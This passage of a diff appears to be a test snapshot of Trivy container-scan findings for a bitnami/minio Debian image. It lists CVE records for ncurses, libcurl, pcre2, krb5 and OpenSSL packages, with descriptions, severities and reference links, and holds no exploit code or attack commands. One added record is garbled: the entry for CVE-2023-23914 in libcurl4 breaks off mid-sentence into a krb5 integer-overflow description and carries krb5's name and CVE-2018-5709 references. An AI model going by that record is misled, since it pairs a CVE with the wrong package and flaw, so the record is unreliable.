"6.2+20201114-2", - "packageName": "libncursesw6", + "id": "CVE-2022-32221", + "installedVersion": "7.74.0-1.3+deb11u2", + "packageName": "libcurl4", "references": [ - "http://seclists.org/fulldisclosure/2022/Oct/41", - "https://access.redhat.com/security/cve/CVE-2022-29458", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29458", - "https://invisible-island.net/ncurses/NEWS.html#t20220416", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00037.html", - "https://lists.gnu.org/archive/html/bug-ncurses/2022-04/msg00014.html", - "https://lists.gnu.org/archive/html/bug-ncurses/2022-04/msg00016.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-29458", - "https://support.apple.com/kb/HT213488", - "https://ubuntu.com/security/notices/USN-5477-1", - "https://ubuntu.com/security/notices/USN-6099-1", - "https://www.cve.org/CVERecord?id=CVE-2022-29458", + "http://seclists.org/fulldisclosure/2023/Jan/19", + "http://seclists.org/fulldisclosure/2023/Jan/20", + "http://www.openwall.com/lists/oss-security/2023/05/17/4", + "https://access.redhat.com/errata/RHSA-2023:0333", + "https://access.redhat.com/security/cve/CVE-2022-32221", + "https://bugzilla.redhat.com/2135411", + "https://bugzilla.redhat.com/show_bug.cgi?id=2135411", + "https://curl.se/docs/CVE-2022-32221.html", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32221", + "https://errata.almalinux.org/9/ALSA-2023-0333.html", + "https://errata.rockylinux.org/RLSA-2023:0333", + "https://hackerone.com/reports/1704017", + "https://linux.oracle.com/cve/CVE-2022-32221.html", + "https://linux.oracle.com/errata/ELSA-2023-0333.html", + "https://lists.debian.org/debian-lts-announce/2023/01/msg00028.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-32221", + "https://security.gentoo.org/glsa/202212-01", + "https://security.netapp.com/advisory/ntap-20230110-0006/", + "https://security.netapp.com/advisory/ntap-20230208-0002/", + "https://support.apple.com/kb/HT213604", + "https://support.apple.com/kb/HT213605", + "https://ubuntu.com/security/notices/USN-5702-1", + "https://ubuntu.com/security/notices/USN-5702-2", + "https://ubuntu.com/security/notices/USN-5823-1", + "https://www.cve.org/CVERecord?id=CVE-2022-32221", + "https://www.debian.org/security/2023/dsa-5330", ], }, "category": "Vulnerability", - "description": "ncurses 6.3 before patch 20220416 has an out-of-bounds read and segmentation violation in convert_strings in tinfo/read_entry.c in the terminfo library.", + "description": "When doing HTTP(S) transfers, libcurl might erroneously use the read callback (\`CURLOPT_READFUNCTION\`) to ask for data to send, even when the \`CURLOPT_POSTFIELDS\` option has been set, if the same handle previously was used to issue a \`PUT\` request which used that callback. This flaw may surprise the application and cause it to misbehave and either send off the wrong data or use memory after free or similar in the subsequent \`POST\` request. The problem exists in the logic for a reused handle when it is changed from a PUT to a POST.", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "ncurses: segfaulting OOB read", + "name": "POST following PUT confusion", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-29458", + "value": "https://avd.aquasec.com/nvd/cve-2022-32221", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2022/Oct/41", + "value": "http://seclists.org/fulldisclosure/2023/Jan/19", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-29458", + "value": "http://seclists.org/fulldisclosure/2023/Jan/20", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29458", + "value": "http://www.openwall.com/lists/oss-security/2023/05/17/4", }, { "type": "URL", - "value": "https://invisible-island.net/ncurses/NEWS.html#t20220416", + "value": "https://access.redhat.com/errata/RHSA-2023:0333", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00037.html", + "value": "https://access.redhat.com/security/cve/CVE-2022-32221", }, { "type": "URL", - "value": "https://lists.gnu.org/archive/html/bug-ncurses/2022-04/msg00014.html", + "value": "https://bugzilla.redhat.com/2135411", }, { "type": "URL", - "value": "https://lists.gnu.org/archive/html/bug-ncurses/2022-04/msg00016.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2135411", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-29458", + "value": "https://curl.se/docs/CVE-2022-32221.html", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213488", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32221", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5477-1", + "value": "https://errata.almalinux.org/9/ALSA-2023-0333.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6099-1", + "value": "https://errata.rockylinux.org/RLSA-2023:0333", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-29458", + "value": "https://hackerone.com/reports/1704017", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-29491", - "installedVersion": "6.2+20201114-2", - "packageName": "libncursesw6", - "references": [ - "http://ncurses.scripts.mit.edu/?p=ncurses.git;a=commit;h=eb51b1ea1f75a0ec17c9c5937cb28df1e8eeec56", - "http://www.openwall.com/lists/oss-security/2023/04/19/10", - "http://www.openwall.com/lists/oss-security/2023/04/19/11", - "https://access.redhat.com/security/cve/CVE-2023-29491", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29491", - "https://invisible-island.net/ncurses/NEWS.html#index-t20230408", - "https://nvd.nist.gov/vuln/detail/CVE-2023-29491", - "https://security.netapp.com/advisory/ntap-20230517-0009/", - "https://ubuntu.com/security/notices/USN-6099-1", - "https://www.cve.org/CVERecord?id=CVE-2023-29491", - "https://www.openwall.com/lists/oss-security/2023/04/12/5", - "https://www.openwall.com/lists/oss-security/2023/04/13/4", - ], - }, - "category": "Vulnerability", - "description": "ncurses before 6.4 20230408, when used by a setuid application, allows local users to trigger security-relevant memory corruption via malformed data in a terminfo database file that is found in $HOME/.terminfo or reached via the TERMINFO or TERM environment variable.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "Local users can trigger security-relevant memory corruption via malformed data", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-29491", + "value": "https://linux.oracle.com/cve/CVE-2022-32221.html", }, { "type": "URL", - "value": "http://ncurses.scripts.mit.edu/?p=ncurses.git;a=commit;h=eb51b1ea1f75a0ec17c9c5937cb28df1e8eeec56", + "value": "https://linux.oracle.com/errata/ELSA-2023-0333.html", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/04/19/10", + "value": "https://lists.debian.org/debian-lts-announce/2023/01/msg00028.html", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/04/19/11", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-32221", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-29491", + "value": "https://security.gentoo.org/glsa/202212-01", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29491", + "value": "https://security.netapp.com/advisory/ntap-20230110-0006/", }, { "type": "URL", - "value": "https://invisible-island.net/ncurses/NEWS.html#index-t20230408", + "value": "https://security.netapp.com/advisory/ntap-20230208-0002/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-29491", + "value": "https://support.apple.com/kb/HT213604", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230517-0009/", + "value": "https://support.apple.com/kb/HT213605", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6099-1", + "value": "https://ubuntu.com/security/notices/USN-5702-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-29491", + "value": "https://ubuntu.com/security/notices/USN-5702-2", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2023/04/12/5", + "value": "https://ubuntu.com/security/notices/USN-5823-1", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2023/04/13/4", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-32221", + }, + { + "type": "URL", + "value": "https://www.debian.org/security/2023/dsa-5330", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "10.36-2+deb11u1", + "fixedVersion": undefined, "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-1586", - "installedVersion": "10.36-2", - "packageName": "libpcre2-8-0", + "id": "CVE-2023-23914", + "installedVersion": "7.74.0-1.3+deb11u2", + "packageName": "libcurl4", "references": [ - "https://access.redhat.com/errata/RHSA-2022:5809", - "https://access.redhat.com/security/cve/CVE-2022-1586", - "https://bugzilla.redhat.com/2077976", - "https://bugzilla.redhat.com/show_bug.cgi?id=2077976", - "https://bugzilla.redhat.com/show_bug.cgi?id=2077976,", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1586", - "https://errata.almalinux.org/8/ALSA-2022-5809.html", - "https://errata.rockylinux.org/RLSA-2022:5809", - "https://github.com/PCRE2Project/pcre2/commit/50a51cb7e67268e6ad417eb07c9de9bfea5cc55a,", - "https://github.com/PCRE2Project/pcre2/commit/d4fa336fbcc388f89095b184ba6d99422cfc676c", - "https://linux.oracle.com/cve/CVE-2022-1586.html", - "https://linux.oracle.com/errata/ELSA-2022-5809.html", - "https://lists.debian.org/debian-lts-announce/2023/03/msg00014.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DWNG2NS3GINO6LQYUVC4BZLUQPJ3DYHA/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXINO3KKI5DICQ45E2FKD6MKVMGJLEKJ/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KAX7767BCUFC7JMDGP7GOQ5GIZCAUGBB/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/M2GLQQUEY5VFM57CFYXVIFOXN2HUZPDM/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-1586", - "https://security.netapp.com/advisory/ntap-20221028-0009/", - "https://ubuntu.com/security/notices/USN-5627-1", - "https://ubuntu.com/security/notices/USN-5627-2", - "https://www.cve.org/CVERecord?id=CVE-2022-1586", + "https://access.redhat.com/security/cve/CVE-2023-23914", + "https://curl.se/docs/CVE-2023-23914.html", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-23914", + "https://hackerone.com/reports/1813864", + "https://nvd.nist.gov/vuln/detail/CVE-2023-23914", + "https://security.netapp.com/advisory/ntap-20230309-0006/", + "https://ubuntu.com/security/notices/USN-5891-1", + "https://www.cve.org/CVERecord?id=CVE-2023-23914", ], }, "category": "Vulnerability", - "description": "An out-of-bounds read vulnerability was discovered in the PCRE2 library in the compile_xclass_matchingpath() function of the pcre2_jit_compile.c file. This involves a unicode property matching issue in JIT-compiled regular expressions. The issue occurs because the character was not fully read in case-less matching within JIT.", + "description": "A cleartext transmission of sensitive information vulnerability exists in curl n_key_data" in kadmin/dbutil/dump.c that can store 16-bit data but unknowingly the developer has assigned a "u4" variable to it, which is for 32-bit data. An attacker can use this vulnerability to affect other artifacts of the database as we know that a Kerberos database dump file contains trusted data.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "krb5: integer overflow in dbentry->n_key_data in kadmin/dbutil/dump.c", + "references": [ { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", + "value": "https://avd.aquasec.com/nvd/cve-2018-5709", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", + "value": "https://access.redhat.com/security/cve/CVE-2018-5709", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", + "value": "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", + "value": "https://www.cve.org/CVERecord?id=CVE-2018-5709", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": "1.18.3-6+deb11u3", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-42898", + "installedVersion": "1.18.3-6+deb11u1", + "packageName": "libk5crypto3", + "references": [ + "https://access.redhat.com/errata/RHSA-2022:8637", + "https://access.redhat.com/security/cve/CVE-2022-42898", + "https://bugzilla.redhat.com/2140960", + "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", + "https://bugzilla.samba.org/show_bug.cgi?id=15203", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", + "https://errata.almalinux.org/9/ALSA-2022-8637.html", + "https://errata.rockylinux.org/RLSA-2022:8637", + "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", + "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", + "https://linux.oracle.com/cve/CVE-2022-42898.html", + "https://linux.oracle.com/errata/ELSA-2023-12104.html", + "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", + "https://security.netapp.com/advisory/ntap-20230216-0008/", + "https://security.netapp.com/advisory/ntap-20230223-0001/", + "https://ubuntu.com/security/notices/USN-5800-1", + "https://ubuntu.com/security/notices/USN-5822-1", + "https://ubuntu.com/security/notices/USN-5822-2", + "https://ubuntu.com/security/notices/USN-5828-1", + "https://ubuntu.com/security/notices/USN-5936-1", + "https://web.mit.edu/kerberos/advisories/", + "https://web.mit.edu/kerberos/krb5-1.19/", + "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", + "https://www.cve.org/CVERecord?id=CVE-2022-42898", + "https://www.samba.org/samba/security/CVE-2022-42898.html", + ], + }, + "category": "Vulnerability", + "description": "PAC parsing in MIT Kerberos 5 (aka krb5) before 1.19.4 and 1.20.x before 1.20.1 has integer overflows that may lead to remote code execution (in KDC, kadmind, or a GSS or Kerberos application server) on 32-bit platforms (which have a resultant heap-based buffer overflow), and cause a denial of service on other platforms. This occurs in krb5_pac_parse in lib/krb5/krb/pac.c. Heimdal before 7.7.1 has "a similar bug."", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "integer overflow vulnerabilities in PAC parsing", + "references": [ { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", + "value": "https://avd.aquasec.com/nvd/cve-2022-42898", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", + "value": "https://access.redhat.com/errata/RHSA-2022:8637", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-2165.html", + "value": "https://access.redhat.com/security/cve/CVE-2022-42898", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2023:0946", + "value": "https://bugzilla.redhat.com/2140960", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-p52g-cm5j-mjv4", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-4304.html", + "value": "https://bugzilla.samba.org/show_bug.cgi?id=15203", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-2932.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-4304", + "value": "https://errata.almalinux.org/9/ALSA-2022-8637.html", }, { "type": "URL", - "value": "https://rustsec.org/advisories/RUSTSEC-2023-0007.html", + "value": "https://errata.rockylinux.org/RLSA-2022:8637", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5844-1", + "value": "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-4304", + "value": "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20230207.txt", + "value": "https://linux.oracle.com/cve/CVE-2022-42898.html", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": "1.1.1n-0+deb11u5", - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-0465", - "installedVersion": "1.1.1n-0+deb11u3", - "packageName": "libssl1.1", - "references": [ - "https://access.redhat.com/security/cve/CVE-2023-0465", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0465", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=10325176f3d3e98c6e2b3bf5ab1e3b334de6947a", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=1dd43e0709fece299b15208f36cc7c76209ba0bb", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=b013765abfa80036dc779dd0e50602c57bb3bf95", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=facfb1ab745646e97a1920977ae4a9965ea61d5c", - "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", - "https://nvd.nist.gov/vuln/detail/CVE-2023-0465", - "https://security.netapp.com/advisory/ntap-20230414-0001/", - "https://ubuntu.com/security/notices/USN-6039-1", - "https://www.cve.org/CVERecord?id=CVE-2023-0465", - "https://www.debian.org/security/2023/dsa-5417", - "https://www.openssl.org/news/secadv/20230328.txt", - ], - }, - "category": "Vulnerability", - "description": "Applications that use a non-default option when verifying certificates may be -vulnerable to an attack from a malicious CA to circumvent certain checks. - -Invalid certificate policies in leaf certificates are silently ignored by -OpenSSL and other certificate policy checks are skipped for that certificate. -A malicious CA could use this to deliberately assert invalid certificate policies -in order to circumvent policy checking on the certificate altogether. - -Policy processing is disabled by default but can be enabled by passing -the \`-policy' argument to the command line utilities or by calling the -\`X509_VERIFY_PARAM_set1_policies()' function.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "Invalid certificate policies in leaf certificates are silently ignored", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-0465", + "value": "https://linux.oracle.com/errata/ELSA-2023-12104.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-0465", + "value": "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0465", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=10325176f3d3e98c6e2b3bf5ab1e3b334de6947a", + "value": "https://security.netapp.com/advisory/ntap-20230216-0008/", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=1dd43e0709fece299b15208f36cc7c76209ba0bb", + "value": "https://security.netapp.com/advisory/ntap-20230223-0001/", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=b013765abfa80036dc779dd0e50602c57bb3bf95", + "value": "https://ubuntu.com/security/notices/USN-5800-1", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=facfb1ab745646e97a1920977ae4a9965ea61d5c", + "value": "https://ubuntu.com/security/notices/USN-5822-1", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "value": "https://ubuntu.com/security/notices/USN-5822-2", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0465", + "value": "https://ubuntu.com/security/notices/USN-5828-1", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230414-0001/", + "value": "https://ubuntu.com/security/notices/USN-5936-1", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6039-1", + "value": "https://web.mit.edu/kerberos/advisories/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-0465", + "value": "https://web.mit.edu/kerberos/krb5-1.19/", }, { "type": "URL", - "value": "https://www.debian.org/security/2023/dsa-5417", + "value": "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20230328.txt", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-42898", + }, + { + "type": "URL", + "value": "https://www.samba.org/samba/security/CVE-2022-42898.html", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "1.1.1n-0+deb11u5", + "fixedVersion": undefined, "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-0466", - "installedVersion": "1.1.1n-0+deb11u3", - "packageName": "libssl1.1", + "id": "CVE-2018-5709", + "installedVersion": "1.18.3-6+deb11u1", + "packageName": "libk5crypto3", "references": [ - "https://access.redhat.com/security/cve/CVE-2023-0466", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0466", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=0d16b7e99aafc0b4a6d729eec65a411a7e025f0a", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=51e8a84ce742db0f6c70510d0159dad8f7825908", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=73398dea26de9899fb4baa94098ad0a61f435c72", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fc814a30fc4f0bc54fcea7d9a7462f5457aab061", - "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", - "https://nvd.nist.gov/vuln/detail/CVE-2023-0466", - "https://security.netapp.com/advisory/ntap-20230414-0001/", - "https://ubuntu.com/security/notices/USN-6039-1", - "https://www.cve.org/CVERecord?id=CVE-2023-0466", - "https://www.debian.org/security/2023/dsa-5417", - "https://www.openssl.org/news/secadv/20230328.txt", + "https://access.redhat.com/security/cve/CVE-2018-5709", + "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", + "https://www.cve.org/CVERecord?id=CVE-2018-5709", ], }, "category": "Vulnerability", - "description": "The function X509_VERIFY_PARAM_add0_policy() is documented to -implicitly enable the certificate policy check when doing certificate -verification. However the implementation of the function does not -enable the check which allows certificates with invalid or incorrect -policies to pass the certificate verification. - -As suddenly enabling the policy check could break existing deployments it was -decided to keep the existing behavior of the X509_VERIFY_PARAM_add0_policy() -function. - -Instead the applications that require OpenSSL to perform certificate -policy check need to use X509_VERIFY_PARAM_set1_policies() or explicitly -enable the policy check by calling X509_VERIFY_PARAM_set_flags() with -the X509_V_FLAG_POLICY_CHECK flag argument. - -Certificate policy checks are disabled by default in OpenSSL and are not -commonly used by applications.", + "description": "An issue was discovered in MIT Kerberos 5 (aka krb5) through 1.16. There is a variable "dbentry->n_key_data" in kadmin/dbutil/dump.c that can store 16-bit data but unknowingly the developer has assigned a "u4" variable to it, which is for 32-bit data. An attacker can use this vulnerability to affect other artifacts of the database as we know that a Kerberos database dump file contains trusted data.", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "Certificate policy check not enabled", + "name": "krb5: integer overflow in dbentry->n_key_data in kadmin/dbutil/dump.c", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-0466", + "value": "https://avd.aquasec.com/nvd/cve-2018-5709", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-0466", + "value": "https://access.redhat.com/security/cve/CVE-2018-5709", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0466", + "value": "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=0d16b7e99aafc0b4a6d729eec65a411a7e025f0a", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=51e8a84ce742db0f6c70510d0159dad8f7825908", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=73398dea26de9899fb4baa94098ad0a61f435c72", + "value": "https://www.cve.org/CVERecord?id=CVE-2018-5709", + }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": "1.18.3-6+deb11u3", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-42898", + "installedVersion": "1.18.3-6+deb11u1", + "packageName": "libkrb5-3", + "references": [ + "https://access.redhat.com/errata/RHSA-2022:8637", + "https://access.redhat.com/security/cve/CVE-2022-42898", + "https://bugzilla.redhat.com/2140960", + "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", + "https://bugzilla.samba.org/show_bug.cgi?id=15203", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", + "https://errata.almalinux.org/9/ALSA-2022-8637.html", + "https://errata.rockylinux.org/RLSA-2022:8637", + "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", + "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", + "https://linux.oracle.com/cve/CVE-2022-42898.html", + "https://linux.oracle.com/errata/ELSA-2023-12104.html", + "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", + "https://security.netapp.com/advisory/ntap-20230216-0008/", + "https://security.netapp.com/advisory/ntap-20230223-0001/", + "https://ubuntu.com/security/notices/USN-5800-1", + "https://ubuntu.com/security/notices/USN-5822-1", + "https://ubuntu.com/security/notices/USN-5822-2", + "https://ubuntu.com/security/notices/USN-5828-1", + "https://ubuntu.com/security/notices/USN-5936-1", + "https://web.mit.edu/kerberos/advisories/", + "https://web.mit.edu/kerberos/krb5-1.19/", + "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", + "https://www.cve.org/CVERecord?id=CVE-2022-42898", + "https://www.samba.org/samba/security/CVE-2022-42898.html", + ], + }, + "category": "Vulnerability", + "description": "PAC parsing in MIT Kerberos 5 (aka krb5) before 1.19.4 and 1.20.x before 1.20.1 has integer overflows that may lead to remote code execution (in KDC, kadmind, or a GSS or Kerberos application server) on 32-bit platforms (which have a resultant heap-based buffer overflow), and cause a denial of service on other platforms. This occurs in krb5_pac_parse in lib/krb5/krb/pac.c. Heimdal before 7.7.1 has "a similar bug."", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "integer overflow vulnerabilities in PAC parsing", + "references": [ + { + "type": "URL", + "value": "https://avd.aquasec.com/nvd/cve-2022-42898", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fc814a30fc4f0bc54fcea7d9a7462f5457aab061", + "value": "https://access.redhat.com/errata/RHSA-2022:8637", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "value": "https://access.redhat.com/security/cve/CVE-2022-42898", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0466", + "value": "https://bugzilla.redhat.com/2140960", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230414-0001/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6039-1", + "value": "https://bugzilla.samba.org/show_bug.cgi?id=15203", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-0466", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", }, { "type": "URL", - "value": "https://www.debian.org/security/2023/dsa-5417", + "value": "https://errata.almalinux.org/9/ALSA-2022-8637.html", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20230328.txt", + "value": 